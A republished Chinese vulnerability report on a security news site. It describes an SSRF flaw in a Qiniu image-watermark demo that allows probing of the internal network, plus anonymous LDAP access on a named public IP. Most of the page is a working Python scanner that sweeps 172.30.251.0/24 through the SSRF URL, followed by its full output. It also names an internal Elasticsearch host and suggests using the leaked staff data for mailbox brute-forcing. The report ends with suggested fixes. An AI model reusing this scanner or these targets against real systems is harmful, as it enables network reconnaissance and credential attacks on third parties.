頻道欄目
首頁 > 資訊 > 網站安全 > 正文

七牛某站SSRF可探測內網

16-07-07        來源:[db:作者]  
收藏   我要投稿

七牛某站SSRF可探測內網+Ldap匿名訪問

一、SSRF漏洞

有漏洞的貌似是一個測試站。

http://demos.qiniu.com/demo/qimage/index.html

存在SSRF漏洞接口的作用是先獲取遠程的圖片,然后把圖片制作成水印覆蓋在當前圖片上,用百度的logo做演示,效果如下:

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cHM6Ly93d3cuYmFpZHUuY29tL2ltZy9iZF9sb2dvMS5wbmc=/dissolve/100/gravity/SouthEast

 

2.png

 

image后邊的那串base64編碼是你要探測的IP和端口,如何知道內網的IP呢。這里探測到七牛的一個IP存在elasticsearch未授權訪問。

 

1.PNG

 

可知內網中至少存在這樣一個網段:

172.30.251.168:9200

將http://172.30.251.168:9200編碼為base64放在image后。

http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/aHR0cDovLzE3Mi4zMC4yNTEuMTY4OjkyMDA=/dissolve/100/gravity/SouthEast

如果當前IP存活且端口開放的話,會返回501錯誤。如探測 http://172.30.251.168:9200

 

6.png

 

如果當前IP不存活或者端口不開放的話,會返回502錯誤。如探測 http://172.30.251.168:1356

 

4.png

 

經過測試總結出以下規律。

返回403——IP存活且端口開放,但是該目錄禁止訪問

返回404——IP存活且端口開放,但是不存在該圖片

返回501——IP存活且端口開放

返回502——IP不存活或者端口不開放

這里為了方便測試,寫了一個探測172.30.251網段80端口是否開放的腳本,返回501錯誤的就是IP存活且端口開放。當然如果再深入些,可以通過探測程序的默認logo或者favicon.ico來判斷目標是什么應用。

#coding=utf-8

'''

poc: qiniu_ssrf

url: http://demos.qiniu.com/demo/qimage/index.html

'''

import requests

import base64

from IPy import IP

mask = IP('172.30.251.0/24')

for ip in mask:

print ip

b64Domain = base64.b64encode('http://' + str(ip))

#print b64Domain

req = requests.get("http://rwxf.qiniudn.com/1234.jpg?watermark/1/image/%s/dissolve/100/gravity/SouthEast" % b64Domain)

print req.text + "\n"

qnfile = file('/tmp/qnscan.txt', 'a')

qnfile.write(str(ip) + '\n' + str(req.text) + '\n\n')

qnfile.close()

這是返回的結果

172.30.251.0

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.1

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.2

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.3

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.4

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.5

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.6

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.7

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.8

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.9

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.10

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.11

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.12

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.13

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.14

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.15

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.16

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.17

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.18

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.19

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.20

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.21

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.22

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.23

{"error":"fetch image url failed and statusCode: 403"}

172.30.251.24

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.25

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.26

{"error":"fetch image url failed and statusCode: 403"}

172.30.251.27

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.28

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.29

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.30

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.31

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.32

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.33

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.34

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.35

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.36

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.37

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.38

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.39

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.40

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.41

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.42

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.43

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.44

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.45

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.46

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.47

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.48

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.49

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.50

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.51

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.52

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.53

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.54

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.55

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.56

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.57

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.58

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.59

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.60

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.61

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.62

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.63

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.64

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.65

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.66

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.67

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.68

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.69

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.70

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.71

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.72

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.73

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.74

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.75

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.76

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.77

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.78

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.79

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.80

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.81

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.82

{"error":"fetch image url failed and statusCode: 503"}

172.30.251.83

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.84

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.85

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.86

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.87

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.88

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.89

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.90

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.91

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.92

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.93

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.94

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.95

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.96

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.97

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.98

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.99

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.100

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.101

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.102

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.103

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.104

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.105

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.106

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.107

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.108

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.109

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.110

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.111

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.112

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.113

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.114

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-23441q7XWC6pITgES': No such file or directory @ error/constitute.c/ReadImage/540"}

172.30.251.115

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.116

{"error":"fetch image url failed and statusCode: 404"}

172.30.251.117

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.118

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.119

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.120

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.121

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.122

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.123

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.124

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.125

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.126

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.127

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.128

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.129

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.130

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.131

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.132

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.133

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.134

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.135

{"error":"fetch image url failed and statusCode: 404"}

172.30.251.136

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.137

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.138

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.139

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.140

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.141

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.142

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.143

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.144

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.145

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.146

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-5107kShQhExKivuz': No such file or directory @ error/constitute.c/ReadImage/540"}

172.30.251.147

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.148

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.149

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.150

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.151

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.152

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.153

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.154

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.155

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.156

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.157

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.158

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.159

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.160

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.161

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.162

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.163

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.164

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.165

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.166

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.167

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.168

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.169

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.170

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.171

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.172

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.173

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.174

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.175

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.176

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.177

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.178

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.179

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.180

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.181

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.182

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.183

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.184

{"error":"unsupported format:unsupported format:ERROR_CODER: Entity 'nbsp' not defined\n `No such file or directory` @ error/svg.c/SVGError/2639"}

172.30.251.185

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.186

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.187

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.188

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.189

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.190

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.191

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.192

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.193

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.194

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.195

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.196

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.197

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.198

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.199

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.200

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.201

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.202

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.203

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.204

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.205

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.206

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.207

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.208

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.209

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.210

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.211

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.212

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.213

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.214

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.215

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.216

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.217

{"error":"unsupported format:unsupported format:ERROR_FILE_OPEN: UnableToOpenFile `./run/fopd_tmpdir/magick-24069p9eQJObZhm7U': No such file or directory @ error/constitute.c/ReadImage/540"}

172.30.251.218

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.219

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.220

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.221

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.222

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.223

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.224

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.225

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.226

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.227

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.228

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.229

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.230

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.231

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.232

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.233

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.234

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.235

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.236

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.237

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.238

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.239

{"error":"fetch image url failed and statusCode: 404"}

172.30.251.240

{"error":"fetch image url failed and statusCode: 403"}

172.30.251.241

{"error":"unsupported format:unsupported format:ERROR_MISSING_DELEGATE: NoDecodeDelegateForThisImageFormat `' @ error/constitute.c/ReadImage/501"}

172.30.251.242

{"error":"fetch image url failed and statusCode: 403"}

172.30.251.243

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.244

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.245

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.246

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.247

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.248

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.249

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.250

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.251

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.252

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.253

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.254

{"error":"fetch image url failed and statusCode: 502"}

172.30.251.255

{"error":"fetch image url failed and statusCode: 502"}

二、LDAP匿名訪問

IP:115.231.182.75

端口:389

可獲取企業的所有人員信息,利用這些信息可以用來爆破郵箱或者使用ldap登錄的應用。

 

5.png

 

在測試時,你們搭的一個洋蔥的應用(115.231.182.75:8090)因為有漏洞,不小心測掛掉了,實在是抱歉。

見詳細說明

解決方案:

1. SSRF漏洞,可以統一下返回錯誤信息,避免用戶可以根據錯誤信息來判斷遠端服務器的端口狀態,且限制服務器訪問的IP不能是內網IP。

2. Ldap漏洞,建議關掉Ldap的匿名訪問功能。

相關TAG標簽
上一篇:臺積電:絕大多數7nm客戶都會轉向6nm_IT新聞_博客園
下一篇:最后一頁
相關文章
圖文推薦

關于我們 | 聯系我們 | 廣告服務 | 投資合作 | 版權申明 | 在線幫助 | 網站地圖 | 作品發布 | Vip技術培訓 | 舉報中心

版權所有: 紅黑聯盟--致力于做實用的IT技術學習網站

美女MM131爽爽爽毛片